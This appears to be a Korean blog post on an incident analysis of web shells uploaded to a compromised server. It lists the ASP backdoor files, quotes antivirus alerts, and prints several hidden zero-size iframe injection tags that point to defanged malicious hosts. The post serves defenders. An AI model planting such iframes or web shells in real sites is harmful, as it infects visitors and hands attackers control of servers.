해킹사례 - 웹사이트 디렉토리에 올려진 파일들

다음은,.. 특정 서버의 업로드 폴더를 포함해서 여기저기 올려져 있던 파일 목록입니다.

2007-11-16  오후 10:31           212,480 123.asp
2007-11-16  오후 10:31           164,352 1234.asp
2007-11-16  오후 10:32           164,352 12345.asp
2007-11-16  오후 10:33           839,168 321.asp
2007-11-16  오후 10:33           839,168 aaa.asp
2008-04-12  오전 05:27            76,914 asp.asp
2008-03-30  오후 05:06             5,942 DataTypeLib.asp
2008-03-30  오후 05:05            77,030 n.asp
2007-11-16  오후 10:35            49,664 qqq.asp
2008-03-30  오후 05:06               598 shao.asp
2007-09-21  오후 06:31            79,881 shell.asp
2008-03-30  오후 05:06            25,167 side.asp
2008-03-30  오후 05:06            31,506 sqlultimate.asp
2007-11-16  오후 10:36            49,664 sss.asp
2008-05-09  오후 05:15            82,899 WebShell8.0.asp

대부분 Script Encoder 로 인코딩을 해놓은 상태입니다.

내용은 뭐 대부분,. SQL 조작을 위한 것 또는 업로드된 파일을 다른 사이트를 해킹후 iframe 로 사입하는 경우등 입니다.

<iframe src="hxxp://boc.sbb22.com/home/index.htm width=20 height=0></iframe>
<iframe src=hxxp://sp.070808.net/23.htm width=0 height=0></iframe>
<iframe src="hxxp://w.aeaer.com/ae.htm" width=0 height=0></iframe>
<iframe src="hxxp://qi.ccbtv.net/btv.htm" width=0 height=0></iframe>
<iframe src="hxxp://88.881215.com/88.htm" width=0 height=0></iframe>
<iframe src="hxxp://ca.winvv.com/cn.htm" width=0 height=0></iframe>
<iframe src="hxxp://xx.9365.org/ip/1.htm" width=100 height=0></iframe>
<iframe src=hxxp://acc.jqxx.org/live/index.htm width=100 height=0></iframe>
<iframe src="hxxp://xx.9365.org/ip/1.htm" width=100 height=0></iframe>

- 해당 스크립트를 브라우져에서 실행하면 웜에 감염될 위험이 있습니다. 브라우져는 javascript 실행을 disable 해놓으시고... 테스트 접속를.... -


위 asp 파일들을 로컬 윈도우 탐색기등에서 그냥 엑세스만 해도, Microsoft Forefront Client Security 에서 다음과 같은 경고가 발생합니다.

Microsoft Forefront Client Security 실시간 보호 에이전트가 변경 내용을 감지했습니다. 잠재적인 위험이 있을 수 있으므로 이러한 변경을 수행한 소프트웨어를 분석하는 것이 좋습니다. 이러한 프로그램의 작동 방식에 대한 정보를 사용하여 프로그램의 실행을 허용할지 또는 컴퓨터에서 제거할지 선택할 수 있습니다. 프로그램이나 소프트웨어 게시자를 신뢰할 수 있는 경우에만 변경을 허용하십시오. Microsoft Forefront Client Security은(는) 허용한 변경을 실행 취소할 수 없습니다.
 자세한 내용은 다음을 참조하십시오.
http://go.microsoft.com/fwlink/?linkid=37020&name=Exploit:HTML/IframeRef.gen&
threatid=2147536539

  검색 ID: {80B47AE7-1DC3-41A5-96B2-B63CC2E0939B}
  에이전트: IE 다운로드 및 Outlook Express 첨부 파일
  사용자: WSSPLEX\Administrator
  이름: Exploit:HTML/IframeRef.gen
  ID: 2147536539
  심각도: 심각
  범주: 익스플로이트
  경고 종류: 스파이웨어 및 사용자 동의 없이 설치된 소프트웨어

  검색 ID: {80B47AE7-1DC3-41A5-96B2-B63CC2E0939B}
  에이전트: IE 다운로드 및 Outlook Express 첨부 파일
  사용자: WSSPLEX\Administrator
  이름: Virus:VBS/VBSWGbased.gen
  ID: 2147536537
  심각도: 심각
  범주: 바이러스

  검색 ID: {80B47AE7-1DC3-41A5-96B2-B63CC2E0939B}
  에이전트: IE 다운로드 및 Outlook Express 첨부 파일
  사용자: WSSPLEX\Administrator
  이름: Backdoor:ASP/Ace
  ID: 2147593981
  심각도: 심각
  범주: 백도어

등등.........